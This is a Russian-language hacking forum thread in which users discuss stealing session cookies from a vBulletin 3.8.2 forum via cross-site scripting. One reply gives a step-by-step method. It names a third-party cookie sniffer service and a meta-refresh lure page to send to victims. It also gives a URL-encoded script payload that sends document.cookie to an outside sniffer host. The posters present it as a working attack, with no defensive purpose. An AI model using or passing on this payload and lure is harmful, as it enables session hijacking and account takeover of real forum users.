vBULLETIN 3.8.2 При <script>alert(document.cookie)</script> выдает всякий хлам кроме vb_asessionalhash , при удалении всякого хлама кроме хэша не выдает ничего ! Как с этим бороться? На снифер также не приходят куки .
А как они тебе придут? Через alert чтоли или чё? Зарегайся на sniffer.xaknet.ru Зайди в меню Promo и выбери скрипт со сниффером Создай файл index.html с таким содержанием: <html>
<meta http-equiv="refresh" content="1; url=http://жертва">
</html> После чего залей на свой сайт и дай ссыль на этот файлик юзверям поглядеть. Вместо http://жертва твой линк на XSS (пример: http://site.com/?search=%3C%73%63%72%69%70%74%3E%69%6D%67%20%3D%20%6E%65%77%20%49%6D%61%67%65%28%29%3B%20%69%6D%67%2E%73%72%63%20%3D%20%22%68%74%74%70%3A%2F%2F%73%6E%69%66%66%65%72%2E%78%61%6B%6E%65%74%2E%72%75%2F%69%6D%61%67%65%73%2F%73%6E%69%66%66%65%72%2E%67%69%66%3F%22%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B%3C%2F%73%63%72%69%70%74%3E) где %3C%73%63%72% … - это <sсriрt>img = new Image(); img.src = "http://sniffer.xaknet.ru/images/sniffer.gif?"+document.cookie;</sсriрt> в url-коде.
эммм …. я так и делал! я про то что на сниффер не приходят кукисы и кроме того при алерте кукисов не показывает хэш пароля . Хотя в куках он записан. Месяца 2 назад нашел активную XSS и на этом прогорел .. не знаю почему этот кукис не вылезает :(